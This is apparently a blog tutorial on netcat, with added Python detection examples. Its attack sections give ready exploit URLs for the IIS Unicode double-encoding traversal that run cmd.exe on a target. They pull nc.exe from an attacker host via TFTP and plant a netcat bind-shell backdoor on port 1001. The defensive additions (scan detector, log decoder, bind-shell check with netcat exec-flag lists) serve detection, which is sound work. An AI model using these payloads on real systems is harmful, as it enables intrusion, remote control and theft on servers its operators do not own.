Tuesday, January 25, 2022

Another netcat tutorial

Port scanning ports 1 through 200:

nc -v -w2 -z 192.168.0.2 1-200

-------------------------------

Banner grabbing with nc:

nc -v -n 192.168.0.2 80
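A probe like the scan above leaves a distinctive trace on the target side: one source touching many distinct ports on one host within a few seconds. The following is an added example (not part of the original post) that flags that pattern in connection logs. The log lines are constructed in a hypothetical "timestamp src dst:port action" layout; the parser must be adapted to the real firewall or flow format in use.

```python
"""Flag connect-scan behaviour (one source, many ports, short window).

Added example, not from the original post. SAMPLE_LOG is constructed; the
field layout "timestamp src dst:port action" is an assumption.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 192.168.1.9 probes twelve ports in four seconds,
# while 192.168.1.50 behaves like an ordinary client.
SAMPLE_LOG = """\
2022-01-25T10:00:01 192.168.1.9 192.168.0.2:21 syn
2022-01-25T10:00:01 192.168.1.9 192.168.0.2:22 syn
2022-01-25T10:00:01 192.168.1.9 192.168.0.2:23 syn
2022-01-25T10:00:02 192.168.1.9 192.168.0.2:25 syn
2022-01-25T10:00:02 192.168.1.9 192.168.0.2:53 syn
2022-01-25T10:00:02 192.168.1.9 192.168.0.2:80 syn
2022-01-25T10:00:03 192.168.1.9 192.168.0.2:110 syn
2022-01-25T10:00:03 192.168.1.9 192.168.0.2:135 syn
2022-01-25T10:00:03 192.168.1.9 192.168.0.2:139 syn
2022-01-25T10:00:04 192.168.1.9 192.168.0.2:143 syn
2022-01-25T10:00:04 192.168.1.9 192.168.0.2:161 syn
2022-01-25T10:00:04 192.168.1.9 192.168.0.2:199 syn
2022-01-25T10:00:05 192.168.1.50 192.168.0.2:80 syn
2022-01-25T10:00:09 192.168.1.50 192.168.0.2:80 syn
2022-01-25T10:00:15 192.168.1.50 192.168.0.2:443 syn
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst_ip, port)."""
    ts, src, dst, _action = line.split()
    dst_ip, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst_ip, int(port)


def find_scanners(log_text, window=timedelta(seconds=10), threshold=10):
    """Return {(src, dst): sorted ports} for every source/destination pair that
    touched at least `threshold` distinct ports inside any sliding `window`."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, port), ...]
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, port = parse_line(line)
            events[(src, dst)].append((ts, port))

    hits = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            # Keep the largest set of distinct ports seen for this pair.
            if len(ports) >= threshold and len(ports) > len(hits.get(key, ())):
                hits[key] = sorted(ports)
    return hits


if __name__ == "__main__":
    for (src, dst), ports in find_scanners(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {len(ports)} distinct ports, e.g. {ports[:5]}")
```

The window and threshold are deliberately parameters: a slow scan with `-w` set high spreads the same probes over a longer period, so tune both against the traffic you actually see rather than the sample values here.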

------------------------------
IIS Unicode File Traversal:

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

Now we want to upload nc.exe to the vulnerable IIS server:

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+192.168.1.9+GET+nc.exe

The command we used:
tftp -i 192.168.1.9 GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

As a TFTP server we can use TFTPD32 by Ph. Jounin.
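The reason `..%255c..` works is double decoding: IIS decodes `%25` to `%` on the first pass, leaving `%5c`, which a second pass turns into `\`, so a check done on the once-decoded path does not see the traversal. The following is an added example (not from the original post) that undoes the encoding the same way and flags requests in a web log that show double encoding, traversal, or the command-execution indicators used on this page (cmd.exe, tftp, nc). The log lines are constructed in a simplified "date time c-ip method uri-stem uri-query status" layout; the field split is an assumption to adapt to the real log format.

```python
"""Decode multiply-encoded IIS request paths and flag traversal / command use.

Added example, not from the original post. SAMPLE_LOG is constructed and its
space-separated "date time c-ip method stem query status" layout is assumed.
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
2022-01-25 10:05:12 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2022-01-25 10:05:40 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+TFTP+-i+192.168.1.9+GET+nc.exe 200
2022-01-25 10:06:03 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+nc.exe+-L+-p+1001+-d+-e+cmd.exe 200
2022-01-25 10:07:00 192.168.1.50 GET /index.html - 200
2022-01-25 10:07:05 192.168.1.50 GET /images/logo.gif - 304
"""

# A ".." path segment delimited by either slash style (IIS accepts both).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Indicators taken from the commands shown on this page.
COMMAND = re.compile(r"\b(cmd\.exe|tftp|nc(\.exe)?)\b", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds). %255c needs two rounds: %255c -> %5c -> \\ .
    A round count of 2 or more is itself a signal of evasion."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_plus(value)   # '+' becomes a space, as IIS treats it
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def analyse(line):
    """Return a record for one log line with a list of findings (may be empty)."""
    _date, _time, client, _method, stem, query, _status = line.split()
    path, path_rounds = decode_fully(stem)
    args, _ = decode_fully(query)
    findings = []
    if path_rounds >= 2:
        findings.append("double-encoded path")
    if TRAVERSAL.search(path):
        findings.append("directory traversal")
    if COMMAND.search(path) or COMMAND.search(args):
        findings.append("command execution")
    return {"client": client, "path": path, "args": args, "findings": findings}


def suspicious(log_text):
    """All records from the log that carry at least one finding."""
    records = (analyse(l) for l in log_text.splitlines() if l.strip())
    return [r for r in records if r["findings"]]


if __name__ == "__main__":
    for r in suspicious(SAMPLE_LOG):
        print(r["client"], r["path"], r["args"], ", ".join(r["findings"]))
```

Run the decoder on the raw `cs-uri-stem` field, not on a field the server has already normalised, or the second round of decoding (the one that reveals the backslash) is never seen.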

---------------------------------

Netcat as a backdoor:

now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> listen and keep listening: re-open the listener after a client disconnects.
-p -> local port to listen on.
-d -> detach from the console (run in the background).
-e -> program to execute once a connection arrives (here cmd.exe).

If we now want to convert this command for use in the Unicode URL, it will look like this:

http://<exploit URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

Example:
nc -v 192.168.80.14 80

GET http://192.168.80.14/scripts/..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+1001+-d+-e+cmd.exe
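On the host, the listener started above is visible as a netcat process that both owns a listening socket and was started with `-e`. The following is an added example (not from the original post) of a host-side check that joins a process list with `netstat -ano`-style output and reports that combination. Both inputs are constructed and simplified; the column layout of NETSTAT and the shape of the process records are assumptions to adapt to whatever the endpoint agent actually collects.

```python
"""Report netcat processes that listen and hand the connection to a program.

Added example, not from the original post. PROCESSES and NETSTAT are constructed;
the netstat column layout "proto local remote state pid" is an assumption.
"""
import shlex

PROCESSES = [
    {"pid": 1532, "image": "nc.exe", "cmdline": "nc -L -p 1001 -d -e cmd.exe"},
    {"pid": 2040, "image": "nc.exe", "cmdline": "nc -v -w2 -z 192.168.0.2 1-200"},
    {"pid": 880, "image": "inetinfo.exe", "cmdline": "inetinfo.exe"},
]

NETSTAT = """\
TCP    0.0.0.0:80        0.0.0.0:0        LISTENING   880
TCP    0.0.0.0:1001      0.0.0.0:0        LISTENING   1532
TCP    192.168.0.2:1035  192.168.1.9:80   SYN_SENT    2040
"""

NETCAT_IMAGES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
# -e (and ncat's --exec / -c / --sh-exec) run a program on the connection.
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
LISTEN_FLAGS = {"-l", "-L"}


def listening_ports(netstat_text):
    """Map pid -> [listening TCP ports] from netstat-style lines."""
    ports = {}
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            ports.setdefault(int(parts[4]), []).append(port)
    return ports


def find_bind_shells(processes, netstat_text):
    """Netcat processes that (a) listen on a socket and (b) carry an exec flag."""
    ports = listening_ports(netstat_text)
    findings = []
    for proc in processes:
        if proc["image"].lower() not in NETCAT_IMAGES:
            continue
        argv = shlex.split(proc["cmdline"])
        listens = bool(LISTEN_FLAGS & set(argv)) and proc["pid"] in ports
        # The argument following an exec flag is the program being handed the socket.
        spawns = [argv[i + 1] for i, a in enumerate(argv[:-1]) if a in EXEC_FLAGS]
        if listens and spawns:
            findings.append({"pid": proc["pid"], "ports": ports[proc["pid"]], "spawns": spawns})
    return findings


if __name__ == "__main__":
    for f in find_bind_shells(PROCESSES, NETSTAT):
        print(f"pid {f['pid']} listens on {f['ports']} and runs {f['spawns']}")
```

The image-name allow-list is the weak point of this check: a renamed binary is missed, so in practice key on the command-line flag pattern and on any listening process whose child is cmd.exe, not on the file name alone.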

------------------------------------------------------

Transferring File with nc.exe:

We want to transfer a file called hack.txt to the IIS server and we don't want to use TFTP. We can use nc.exe to transfer the file instead.

To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc -l -p 1234 > hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS machine with the following command:

nc destination 1234 < hack.txt

Now we can see that the file has been transferred to the target system via port 1234.
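The two commands above are nothing more than a raw TCP stream: the receiver writes whatever arrives until the sender closes, and the sender's close is the only end-of-file marker. The following is an added example (not from the original post) that reproduces that exchange on the loopback interface with Python sockets so both sides can be observed without netcat. The file content is constructed, and because nothing on the wire authenticates either end or protects the bytes, both sides also compute a SHA-256 digest so the transfer can be verified.

```python
"""Loopback re-implementation of `nc -l -p PORT > file` / `nc host PORT < file`.

Added example, not from the original post. FILE_CONTENT is constructed and an
ephemeral port replaces 1234 so the demo never collides with a real listener.
"""
import hashlib
import socket
import threading

FILE_CONTENT = b"constructed sample payload line\n" * 2000   # ~62 KB, several segments


def receive_file(listener):
    """Receiver side (nc -l -p PORT > file): accept one connection and read
    until the peer closes, which is the only end-of-file signal there is."""
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(65536)
            if not data:          # peer closed its sending side: EOF
                break
            chunks.append(data)
    return b"".join(chunks)


def send_file(host, port, payload):
    """Sender side (nc host PORT < file): connect, stream, then close the
    sending direction so the receiver sees EOF. Returns the payload digest."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
    return hashlib.sha256(payload).hexdigest()


def transfer_over_loopback(payload=FILE_CONTENT):
    """Run both sides on 127.0.0.1; return (received bytes, sent digest, received digest)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(target=lambda: result.update(data=receive_file(listener)))
    receiver.start()
    sent_digest = send_file("127.0.0.1", port, payload)
    receiver.join()
    listener.close()

    received = result["data"]
    return received, sent_digest, hashlib.sha256(received).hexdigest()


if __name__ == "__main__":
    received, sent, got = transfer_over_loopback()
    print(len(received), "bytes received;", "digest match" if sent == got else "DIGEST MISMATCH")
```

The digest comparison is the part netcat does not do for you: with `>`/`<` redirection a truncated or tampered stream produces a file that looks complete, so check a hash out of band after any transfer done this way.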

-----------------------------------------------------------